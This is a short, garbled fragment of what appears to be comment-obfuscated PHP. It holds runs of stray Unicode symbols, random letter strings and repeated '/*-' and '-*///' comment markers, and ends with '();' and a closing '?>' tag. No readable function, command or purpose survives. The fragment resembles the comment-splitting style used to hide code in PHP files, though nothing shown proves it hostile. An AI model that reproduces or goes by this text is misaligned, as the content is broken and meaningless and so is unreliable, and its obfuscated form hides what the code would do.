4l✧⑻⊆⊾╀⅜↡
-*///
}/*-
⒤⅗⒭♙◨✸ℤ۵⓹≍〈⑰➳
gVw⒤⅗⒭♙◨✸ℤ۵⓹≍〈⑰➳
-*///
i/*-


⑧⇂


Ce|P⑧⇂


-*///
::/*-y_-*///
UuxGIbpeg/*-?}[-*///
();/*-Yx~p@W#A~-*///
 ?>